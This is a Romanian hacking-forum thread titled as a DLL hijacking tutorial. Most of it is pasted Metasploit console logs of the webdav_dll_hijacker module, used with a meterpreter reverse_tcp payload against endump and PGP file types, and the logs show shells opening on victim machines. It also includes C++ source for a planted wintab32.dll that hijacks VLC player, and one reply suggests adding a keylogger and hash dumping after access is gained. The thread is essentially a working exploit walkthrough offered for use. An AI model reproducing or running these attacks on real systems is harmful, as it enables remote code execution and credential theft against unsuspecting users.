Jump to content
1337

[RO] DLL Hijacking Tutorial

Recommended Posts

Posted

Frumos. Imi palce ideea, o mica sugestie din partea mea: poti adauga si unele optiuni interesante dupa ce s-a pornit o sesiune "meterpreter". Ceva de genu: keylogger, sau pur si simplu niste HASH-uri, s.a.m. (Asta ca un surplus pentru cei necunoscatori, daca tot ai inceput sa explici de la zero)

Spor la tutorial, si speram sa fie ceva bun pana in final.

Posted

eu cred ca te referi la asa ceva te uiti la video

tse.rar

sau asa

Filetype endump

msf exploit(webdav_dll_hijacker) > set EXTENSIONS endump

EXTENSIONS => endump

msf exploit(webdav_dll_hijacker) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

BASENAME policy yes The base name for the listed files.

EXTENSIONS endump yes The list of extensions to generate

SHARENAME documents yes The name of the top-level share.

SRVHOST 192.168.2.37 yes The local host to listen on.

SRVPORT 80 yes The daemon port to listen on (do not change)

URIPATH / yes The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST 192.168.2.37 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(webdav_dll_hijacker) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.2.37:4444

[*]

[*] Exploit links are now available at \\192.168.2.37\documents\

[*]

[*] Using URL: http://192.168.2.37/

[*] Server started.

msf exploit(webdav_dll_hijacker) >

[*] 192.168.2.45:49310 PROPFIND /documents

[*] 192.168.2.45:49310 PROPFIND => 301 (/documents)

[*] 192.168.2.45:49310 PROPFIND /documents/

[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/documents/)

[*] 192.168.2.45:49310 PROPFIND /documents

[*] 192.168.2.45:49310 PROPFIND => 301 (/documents)

[*] 192.168.2.45:49310 PROPFIND /documents/

[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/documents/)

[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory

[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS

[*] 192.168.2.45:49310 PROPFIND => 301 (/DOCUMENTS)

[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS/

[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/)

[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory

[*] 192.168.2.45:49310 PROPFIND /documents/rsaenh.dll

[*] 192.168.2.45:49310 PROPFIND => 207 File (/documents/rsaenh.dll)

[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS

[*] 192.168.2.45:49310 PROPFIND => 301 (/DOCUMENTS)

[*] 192.168.2.45:49310 PROPFIND /DOCUMENTS/

[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/)

[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory

[*] 192.168.2.45:49310 GET => DLL Payload

[*] 192.168.2.45:49310 PROPFIND /documents/SDDisk.dll

[*] 192.168.2.45:49310 PROPFIND => 207 Directory (/DOCUMENTS/)

[*] 192.168.2.45:49310 PROPFIND => 207 Top-Level Directory

[*] Sending stage (748544 bytes) to 192.168.2.37

[*] Meterpreter session 14 opened (192.168.2.37:4444 -> 192.168.2.45:49315)

msf exploit(webdav_dll_hijacker) > sessions -i 14

[*] Starting interaction with 14...

meterpreter > getuid

Server username: root-Vista\neox

-----------------------------------------------------------------------------------------

PGP - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)

msf exploit(webdav_dll_hijacker) > set EXTENSIONS pgp

EXTENSIONS => pgp

msf exploit(webdav_dll_hijacker) > show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

BASENAME policy yes The base name for the listed files.

EXTENSIONS pgp yes The list of extensions to generate

SHARENAME documents yes The name of the top-level share.

SRVHOST 192.168.2.37 yes The local host to listen on.

SRVPORT 80 yes The daemon port to listen on (do not change)

URIPATH / yes The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST 192.168.2.37 yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

msf exploit(webdav_dll_hijacker) > exploit

[*] Exploit running as background job.

[*] Started reverse handler on 192.168.2.37:4444

[*]

[*] Exploit links are now available at \\192.168.2.37\documents\

[*]

[*] Using URL: http://192.168.2.37/

[*] Server started.

<snip>

[*] 192.168.2.45:49183 PROPFIND /documents/

[*] 192.168.2.45:49183 PROPFIND => 207 Directory (/documents/)

[*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory

[*] 192.168.2.45:49183 PROPFIND /documents/policy.pgp

[*] 192.168.2.45:49183 PROPFIND => 207 File (/documents/policy.pgp)

[*] 192.168.2.45:49183 PROPFIND /documents/credssp.dll

[*] 192.168.2.45:49183 PROPFIND => 207 File (/documents/credssp.dll)

[*] 192.168.2.45:49183 PROPFIND /

[*] 192.168.2.45:49183 PROPFIND => 207 Directory (/)

[*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory

[*] 192.168.2.45:49183 GET => DLL Payload

[*] 192.168.2.45:49183 PROPFIND /DOCUMENTS

[*] 192.168.2.45:49183 PROPFIND => 301 (/DOCUMENTS)

[*] 192.168.2.45:49183 PROPFIND /DOCUMENTS/

[*] 192.168.2.45:49183 PROPFIND => 207 Directory (/DOCUMENTS/)

[*] 192.168.2.45:49183 PROPFIND => 207 Top-Level Directory

[*] 192.168.2.45:49183 PROPFIND /documents/rundll32.exe

[*] 192.168.2.45:49183 PROPFIND => 404 (/documents/rundll32.exe)

[*] Sending stage (748544 bytes) to 10.8.28.55

[*] Meterpreter session 1 opened (192.168.2.37:4444 -> 192.168.2.45:49189) at Sun Aug 29 20:40:27 +0200 2010

msf exploit(webdav_dll_hijacker) > sessions -i 1

[*] Starting interaction with 1...

meterpreter > getuid

Server username: neox-Vista\neox

si mai sint doua modalitati una ii de exemplu vclplayer cum descrie pe exploitdb codat in ollydbg

Place a .mp3 file and wintab32.dll in same folder and execute .mp3 file in

vlc player.

Code for wintab32.dll:

/*----------*/

/* wintab32.cpp */

#include "stdafx.h"

#include "dragon.h"

void init() {

MessageBox(NULL,"Pwned", "Pwned!",0x00000003);

}

BOOL APIENTRY DllMain( HANDLE hModule,

DWORD ul_reason_for_call,

LPVOID lpReserved

)

{

switch (ul_reason_for_call)

{

case DLL_PROCESS_ATTACH:

init();break;

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;

}

return TRUE;

}

/*----------*/

la asta fac eu un video cint am timp si a treia modalitate lucrez deocamdata la ia ....

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...